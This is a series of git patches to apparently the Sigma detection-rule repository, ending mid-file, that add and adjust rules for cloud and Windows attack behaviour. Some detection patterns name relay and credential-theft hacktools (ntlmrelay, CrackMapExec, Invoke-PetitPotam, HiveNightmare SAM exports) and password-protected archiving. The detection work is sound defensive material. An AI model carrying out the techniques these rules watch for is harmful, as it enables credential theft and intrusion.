'UpdateFindingsFilter' + timeframe: 10m + condition: selection | count(eventName) by sourceIPAddress > 5 +fields: + - sourceIPAddress + - userIdentity.arn +falsepositives: + - System or Network administrator behaviors +level: medium From 9de84bf82c749d6a96a93f8437e1802ed017acd9 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:26:17 +0700 Subject: [PATCH 0104/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index f2305ac3..3d05be20 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -1,4 +1,5 @@ -title: AWS Possible Macie Evasion +action: global +title: AWS Macie Evasion id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 status: experimental description: Detects evade to Macie detection. @@ -27,7 +28,7 @@ detection: - 'UpdateClassificationJob' - 'UpdateFindingsFilter' timeframe: 10m - condition: selection | count(eventName) by sourceIPAddress > 5 + condition: selection | count() by sourceIPAddress > 5 fields: - sourceIPAddress - userIdentity.arn From 819fcaea18f9401cded121befe936cf2aee3f9c0 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:38:34 +0700 Subject: [PATCH 0105/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index 3d05be20..f2f56b40 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -5,7 +5,7 @@ status: experimental description: Detects evade to Macie detection. author: Sittikorn S date: 2021/07/06 -reference: +references: - https://docs.aws.amazon.com/cli/latest/reference/macie/ tags: - attack.defensive_evasion From b74ff205a3e0b9767fc14e21b9dfe1488e7f90ec Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:43:48 +0700 Subject: [PATCH 0106/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index f2f56b40..294d73c1 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -1,4 +1,3 @@ -action: global title: AWS Macie Evasion id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 status: experimental @@ -24,9 +23,9 @@ detection: - 'UpdateFindingsFilter' - 'UpdateMacieSession' - 'UpdateMemberSession' - - 'DisableOrganizationAdminAccount' - 'UpdateClassificationJob' - 'UpdateFindingsFilter' + - 'DisableOrganizationAdminAccount' timeframe: 10m condition: selection | count() by sourceIPAddress > 5 fields: From 21c4d241a1fe8caffe40a25852b0fc3e7ec9315c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 26 Jul 2021 10:59:35 +0200 Subject: [PATCH 0107/1367] HiveNightmare and Relay attack tools adjustments --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- rules/windows/process_creation/win_tools_relay_attacks.yml | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 42bb5ee0..47292ac6 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -25,7 +25,7 @@ detection: - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version - TargetFilename: - - 'C:\windows\temp\sam' + - 'C:\windows\temp\sam' # C# version of HiveNightmare condition: selection fields: - CommandLine diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml index 89ce6ef1..a795b987 100644 --- a/rules/windows/process_creation/win_tools_relay_attacks.yml +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -4,6 +4,7 @@ id: 5589ab4f-a767-433c-961d-c91f3f704db1 description: Detects different hacktools used for relay attacks on Windows for privilege escalation author: Florian Roth date: 2021/07/24 +modified: 2021/07/26 references: - https://attack.mitre.org/techniques/T1557/001/ - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ @@ -39,6 +40,7 @@ detection: - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' + - 'Invoke-PetitPotam' condition: selection_pe or selection_script falsepositives: - Legitimate files with these rare hacktool names From d6078582d1e2574c6cadd324beaa59a791b26006 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 17:16:12 +0700 Subject: [PATCH 0108/1367] Rename aws_macic_evasion to aws_macic_evasion.yml extend .yml --- rules/cloud/{aws_macic_evasion => aws_macic_evasion.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{aws_macic_evasion => aws_macic_evasion.yml} (100%) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion.yml similarity index 100% rename from rules/cloud/aws_macic_evasion rename to rules/cloud/aws_macic_evasion.yml From 899baa073e0826e6bda1e5638267cef5b83092c6 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 17:21:47 +0700 Subject: [PATCH 0109/1367] Update aws_macic_evasion.yml --- rules/cloud/aws_macic_evasion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws_macic_evasion.yml index 294d73c1..8e1676a6 100644 --- a/rules/cloud/aws_macic_evasion.yml +++ b/rules/cloud/aws_macic_evasion.yml @@ -7,7 +7,7 @@ date: 2021/07/06 references: - https://docs.aws.amazon.com/cli/latest/reference/macie/ tags: - - attack.defensive_evasion + - attack.defense_evasion - attack.t1562.001 logsource: service: cloudtrail From 015d179b4161675e00679333f625e3831bfd073a Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 21:27:59 +0700 Subject: [PATCH 0110/1367] Update aws_macic_evasion.yml --- rules/cloud/aws_macic_evasion.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws_macic_evasion.yml index 8e1676a6..07c3c9c5 100644 --- a/rules/cloud/aws_macic_evasion.yml +++ b/rules/cloud/aws_macic_evasion.yml @@ -20,12 +20,11 @@ detection: - 'DisassociateFromMasterAccount' - 'DisassociateMember' - 'DisableMacie' + - 'DisableOrganizationAdminAccount' - 'UpdateFindingsFilter' - 'UpdateMacieSession' - 'UpdateMemberSession' - 'UpdateClassificationJob' - - 'UpdateFindingsFilter' - - 'DisableOrganizationAdminAccount' timeframe: 10m condition: selection | count() by sourceIPAddress > 5 fields: From d2592ee0b60b0428ed12c191793896bf19db1a01 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?G=C3=A1bor=20Lipt=C3=A1k?= Date: Mon, 26 Jul 2021 16:26:03 -0400 Subject: [PATCH 0111/1367] Add yamllint to GHA MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Gábor Lipták --- .github/workflows/sigma-test.yml | 10 +- Makefile | 4 +- ...d_cmd_and_powershell_spawned_processes.yml | 2 +- ...stall_elevated_parent_child_correlated.yml | 2 +- ..._party_drivers_exploits_token_stealing.yml | 2 +- ...ivilege_escalation_using_rotten_potato.yml | 2 +- .../{invalid_yaml.yml => invalid_yaml.badyml} | 0 tools/config/arcsight-zeek.yml | 4 +- tools/config/ecs-auditd.yml | 5 +- tools/config/ecs-filebeat.yml | 2 +- tools/config/logrhythm_winevent.yml | 140 +++++++++--------- tools/config/winlogbeat-modules-enabled.yml | 3 +- tools/config/winlogbeat.yml | 5 +- 13 files changed, 91 insertions(+), 90 deletions(-) rename tests/{invalid_yaml.yml => invalid_yaml.badyml} (100%) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index d94d319d..2d1f625b 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -8,7 +8,9 @@ on: branches: - "*" pull_request: - branches: [ master, oscd ] + branches: + - master + - oscd jobs: test-sigma: @@ -31,3 +33,9 @@ jobs: - name: Test SQL(ite) Backend run: | pipenv run make test-backend-sql + yamllint: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: yaml-lint + uses: ibiqlik/action-yamllint@v3 diff --git a/Makefile b/Makefile index 96870aec..ea442b75 100644 --- a/Makefile +++ b/Makefile @@ -104,7 +104,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml -o $(TMPOUT) - < tests/collection_repeat.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t xpack-watcher -c tools/config/winlogbeat.yml -O output=foobar -O es=es -O foobar rules/windows/builtin/win_susp_failed_logons_single_source.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/not_existing.yml > /dev/null - ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_yaml.yml > /dev/null + ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_yaml.badyml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-no_identifiers.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-no_condition.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-invalid_identifier_reference.yml > /dev/null @@ -113,7 +113,7 @@ test-sigmac: ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml rules/windows/builtin/win_susp_failed_logons_single_source.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml -o /not_possible rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c not_existing rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml - ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_yaml.yml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml + ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_yaml.badyml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_config.yml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml test-merge: diff --git a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index ade22426..931cae2c 100644 --- a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -13,7 +13,7 @@ tags: logsource: product: windows category: process_creation - definition : Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section detection: parent_image: ParentImage|endswith: diff --git a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml index bcd2772a..07ca9c1a 100644 --- a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml +++ b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml @@ -35,7 +35,7 @@ fields: - IntegrityLevel - User - Image - ParentProcessGuid + - ParentProcessGuid falsepositives: - System administrator usage - Penetration test diff --git a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index da3c9882..cd2ce7d8 100644 --- a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -12,7 +12,7 @@ date: 2019/06/03 logsource: category: process_creation product: windows - definition : Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section detection: selection: ParentIntegrityLevel: Medium diff --git a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml index 45351522..94c1560f 100644 --- a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml +++ b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml @@ -15,7 +15,7 @@ modified: 2020/09/01 logsource: category: process_creation product: windows - definition : Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section detection: selection: ParentUser: diff --git a/tests/invalid_yaml.yml b/tests/invalid_yaml.badyml similarity index 100% rename from tests/invalid_yaml.yml rename to tests/invalid_yaml.badyml diff --git a/tools/config/arcsight-zeek.yml b/tools/config/arcsight-zeek.yml index f9544552..a9272cc2 100644 --- a/tools/config/arcsight-zeek.yml +++ b/tools/config/arcsight-zeek.yml @@ -458,7 +458,7 @@ fieldmappings: #service=http: #service=sip: msg: - - 'message' + - 'message' #service=notice: #service=pop3: name: @@ -832,7 +832,7 @@ fieldmappings: #password: pending: message #status: message - successful_commands: message + successful_commands: message #username: sourceUserName # Radius connect_info: message diff --git a/tools/config/ecs-auditd.yml b/tools/config/ecs-auditd.yml index 43e84fcc..c5c9a0cc 100644 --- a/tools/config/ecs-auditd.yml +++ b/tools/config/ecs-auditd.yml @@ -1,4 +1,4 @@ -title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules +title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules order: 20 backends: - es-qs @@ -70,7 +70,6 @@ fieldmappings: data: data default-context: default-context dev: dev - dev: dev device: device dir: dir direction: direction @@ -92,7 +91,6 @@ fieldmappings: feature: feature fi: fi fp: fp - fp: fp format: format fsgid: fsgid fsuid: fsuid @@ -169,7 +167,6 @@ fieldmappings: ogid: ogid ocomm: ocomm old: old - old: old old-auid: old-auid old-chardev: old-chardev old-disk: old-disk diff --git a/tools/config/ecs-filebeat.yml b/tools/config/ecs-filebeat.yml index 8c95dac0..dd85cc7a 100644 --- a/tools/config/ecs-filebeat.yml +++ b/tools/config/ecs-filebeat.yml @@ -1,4 +1,4 @@ -title: Elastic filebeat (from 7.x) index pattern and field mapping following Elastic Common Schema +title: Elastic filebeat (from 7.x) index pattern and field mapping following Elastic Common Schema order: 20 backends: - es-qs diff --git a/tools/config/logrhythm_winevent.yml b/tools/config/logrhythm_winevent.yml index 84b6bee4..9ca034ab 100644 --- a/tools/config/logrhythm_winevent.yml +++ b/tools/config/logrhythm_winevent.yml @@ -1,71 +1,71 @@ ---- -title: LogRhythm Windows EventID Field Mapping - -order: 20 -backends: - - es-qs-lr - -logsources: - eventlogs: - product: windows - conditions: - logSourceTypeName: 'MS Windows Event Logging XML - Security' - -fieldmappings: - EventID: vendorMessageID - TicketOptions: object - TicketEncryptionType: sessionType - ServiceName: processName - TargetUserName: - - originUser - - impactedUser - Workstation: originHostname - SubjectUserName: originUser - LogonType: command - LogonProcessName: processName - WorkstationName: - - originHostname - - impactedHostname - SubjectLogonId: session - SubStatus: status - IpPort: originPort - IpAddress: - - originIp - - impactedIp - ErrorCode: responseCode - Task: vendorInfo - PrivilegeList: subject - SamAccountName: impactedUser - PrimaryGroupId: group - StatusCode: responseCode - Level: severity - SubjectDomainName: domainOrigin - DSName: domainImpacted - ObjectDN: objectName - ObjectGUID: object - ObjectClass: objectType - OperationType: action - Computer: impactedHostname - CategoryId: policy - SubcategoryId: objectName - SubCategoryGuid: object - AuditPolicyChanges: action - ObjectCollectionName: objectType - CountOfCredentialsReturned: quantity - AlgorithmName: policy - KeyName: objectName - KeyType: objectType - KeyFilePath: object - Operation: action - ReturnCode: responseCode - ChannelType: objectType - DomainName: domainImpacted - ExecutionProcessId: processId - processName: process - ProviderName: vendorInfo - SChannelName: objectName - SecureChannelName: objectName - ThreadId: session - UserName: - - originUser +--- +title: LogRhythm Windows EventID Field Mapping + +order: 20 +backends: + - es-qs-lr + +logsources: + eventlogs: + product: windows + conditions: + logSourceTypeName: 'MS Windows Event Logging XML - Security' + +fieldmappings: + EventID: vendorMessageID + TicketOptions: object + TicketEncryptionType: sessionType + ServiceName: processName + TargetUserName: + - originUser + - impactedUser + Workstation: originHostname + SubjectUserName: originUser + LogonType: command + LogonProcessName: processName + WorkstationName: + - originHostname + - impactedHostname + SubjectLogonId: session + SubStatus: status + IpPort: originPort + IpAddress: + - originIp + - impactedIp + ErrorCode: responseCode + Task: vendorInfo + PrivilegeList: subject + SamAccountName: impactedUser + PrimaryGroupId: group + StatusCode: responseCode + Level: severity + SubjectDomainName: domainOrigin + DSName: domainImpacted + ObjectDN: objectName + ObjectGUID: object + ObjectClass: objectType + OperationType: action + Computer: impactedHostname + CategoryId: policy + SubcategoryId: objectName + SubCategoryGuid: object + AuditPolicyChanges: action + ObjectCollectionName: objectType + CountOfCredentialsReturned: quantity + AlgorithmName: policy + KeyName: objectName + KeyType: objectType + KeyFilePath: object + Operation: action + ReturnCode: responseCode + ChannelType: objectType + DomainName: domainImpacted + ExecutionProcessId: processId + processName: process + ProviderName: vendorInfo + SChannelName: objectName + SecureChannelName: objectName + ThreadId: session + UserName: + - originUser - impactedUser \ No newline at end of file diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 5cfb81d3..eb3bf37c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -225,7 +225,6 @@ fieldmappings: Accesses: winlog.event_data.Accesses AccessList: winlog.event_data.AccessList AttributeValue: winlog.event_data.AttributeValue - AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName AuthenticationPackage: winlog.event_data.AuthenticationPackageName CallerProcessName: winlog.event_data.CallerProcessName @@ -279,4 +278,4 @@ fieldmappings: TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation : winlog.event_data.Workstation + Workstation: winlog.event_data.Workstation diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index 97b5fa80..87ffb4ac 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -203,8 +203,6 @@ fieldmappings: ContextInfo: winlog.event_data.ContextInfo # from here missing field at 20210706 Accesses: winlog.event_data.Accesses - AccessList: winlog.event_data.AccessList - AttributeValue: winlog.event_data.AttributeValue AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName AuthenticationPackage: winlog.event_data.AuthenticationPackageName @@ -214,7 +212,6 @@ fieldmappings: Company: winlog.event_data.Company DestAddress: winlog.event_data.DestAddress Destination: winlog.event_data.Destination - DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 DestPort: winlog.event_data.DestPort Device: winlog.event_data.Device DeviceDescription: winlog.event_data.DeviceDescription @@ -258,4 +255,4 @@ fieldmappings: TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation : winlog.event_data.Workstation + Workstation: winlog.event_data.Workstation From 6f62f5f2516d2655a9b0502efa5555fe520be594 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 08:04:24 +0200 Subject: [PATCH 0112/1367] Update azure_kubernetes_pods_deleted.yml --- rules/cloud/azure_kubernetes_pods_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml index 95f31977..53ea882c 100644 --- a/rules/cloud/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure_kubernetes_pods_deleted.yml @@ -11,7 +11,7 @@ logsource: service: azure.activitylogs detection: selection_operation_name: - - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE condition: selection_operation_name level: medium tags: From ade5e80f9d59fa1d354e801664ac285f1f0eb89f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 08:07:00 +0200 Subject: [PATCH 0113/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index 775c650a..b84ac76a 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -11,7 +11,7 @@ logsource: service: azure.activitylogs detection: selection_operation_name: - - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE condition: selection_operation_name level: medium tags: From 8aa79b9d86db613c8bf3a8691e3d931eb01f815c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 08:50:03 +0200 Subject: [PATCH 0114/1367] add process_creation_clip.yml --- .../process_creation_clip.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_clip.yml diff --git a/rules/windows/process_creation/process_creation_clip.yml b/rules/windows/process_creation/process_creation_clip.yml new file mode 100644 index 00000000..9bef6b0f --- /dev/null +++ b/rules/windows/process_creation/process_creation_clip.yml @@ -0,0 +1,22 @@ +title: Use of CLIP +id: ddeff553-5233-4ae9-bbab-d64d2bd634be +status: experimental +author: frack113 +date: 2021/07/27 +description: Adversaries may collect data stored in the clipboard from users copying information within or between applications. +references: + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md +tags: + - attack.collection + - attack.t1115 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: clip.exe + condition: selection +falsepositives: + - Unknown +level: low From f3bcffeb0a72bca185739317eaab1b1ba97566df Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 09:58:00 +0200 Subject: [PATCH 0115/1367] Tune false positive --- .../windows/registry_event/sysmon_office_vsto_persistence.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_office_vsto_persistence.yml b/rules/windows/registry_event/sysmon_office_vsto_persistence.yml index 8eac61ee..c8dbeb08 100644 --- a/rules/windows/registry_event/sysmon_office_vsto_persistence.yml +++ b/rules/windows/registry_event/sysmon_office_vsto_persistence.yml @@ -4,17 +4,19 @@ status: experimental description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. references: - https://twitter.com/_vivami/status/1347925307643355138 + - https://vanmieghem.io/stealth-outlook-persistence/ tags: - attack.t1137.006 - attack.persistence author: Bhabesh Raj date: 2021/01/10 -modified: 2021/06/01 +modified: 2021/07/27 logsource: category: registry_event product: windows detection: selection: + EventType: SetValue TargetObject|contains: - '\Software\Microsoft\Office\Outlook\Addins\' - '\Software\Microsoft\Office\Word\Addins\' From 7287a46f2fb2ea143eb7272e57d292d86feeba1a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 10:05:57 +0200 Subject: [PATCH 0116/1367] Tune false positive --- rules/windows/registry_event/sysmon_taskcache_entry.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/registry_event/sysmon_taskcache_entry.yml b/rules/windows/registry_event/sysmon_taskcache_entry.yml index 03465933..a4b72df0 100644 --- a/rules/windows/registry_event/sysmon_taskcache_entry.yml +++ b/rules/windows/registry_event/sysmon_taskcache_entry.yml @@ -6,6 +6,7 @@ tags: - attack.t1053 - attack.t1053.005 date: 2021/06/18 +modified: 2021/07/27 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ author: Syed Hasan (@syedhasan009) @@ -17,5 +18,6 @@ logsource: product: windows detection: selection: + EventType: SetValue TargetObject|contains: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' condition: selection From 1a538371c9b447d1c736b4ea319bc0fcb8aba63b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 10:14:03 +0200 Subject: [PATCH 0117/1367] fix: bug in author field (not list) --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 8ea9ea53..1a6c50cd 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -1,9 +1,7 @@ title: SOURGUM Actor Behaviours id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -author: - - MSTIC - - FPT.EagleEye +author: MSTIC, FPT.EagleEye status: experimental level: high references: From 90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 10:14:53 +0200 Subject: [PATCH 0118/1367] fix: bug in author field (cannot be a list) --- .../win_process_creation_bitsadmin_download.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index f6c8a5fb..508bc93c 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml @@ -14,9 +14,7 @@ tags: - attack.t1036.003 date: 2017/03/09 modified: 2021/07/16 -author: - - Michael Haag - - FPT.EagleEye +author: Michael Haag, FPT.EagleEye logsource: category: process_creation product: windows From 8b82fbf36b48990fe0fa307381f6c739028c1ff6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 10:34:46 +0200 Subject: [PATCH 0119/1367] update detection --- .../process_creation/win_susp_rar_flags.yml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rar_flags.yml b/rules/windows/process_creation/win_susp_rar_flags.yml index 16413091..b4a58ce1 100644 --- a/rules/windows/process_creation/win_susp_rar_flags.yml +++ b/rules/windows/process_creation/win_susp_rar_flags.yml @@ -1,12 +1,14 @@ title: Rar with Password or Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: experimental -description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ + - https://ss64.com/bash/rar.html + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2020/08/28 +modified: 2021/07/27 tags: - attack.collection - attack.t1560.001 @@ -16,11 +18,14 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_password: + CommandLine|contains: - ' -hp' + selection_other: + CommandLine|contains: - ' -m' - condition: selection + - ' a ' + condition: selection_password and selection_other falsepositives: - Legitimate use of Winrar command line version - Other command line tools, that use these flags From 227e4bca131e4f3e5dca1f7ad66423660a161ff1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 10:57:32 +0200 Subject: [PATCH 0120/1367] add process_creation_susp_winzip.yml --- .../process_creation_susp_winzip.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_winzip.yml diff --git a/rules/windows/process_creation/process_creation_susp_winzip.yml b/rules/windows/process_creation/process_creation_susp_winzip.yml new file mode 100644 index 00000000..da7d2a78 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_winzip.yml @@ -0,0 +1,30 @@ +title: Compress Data and Lock With Password for Exfiltration With WINZIP +id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d +status: experimental +author: frack113 +date: +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +references: + - 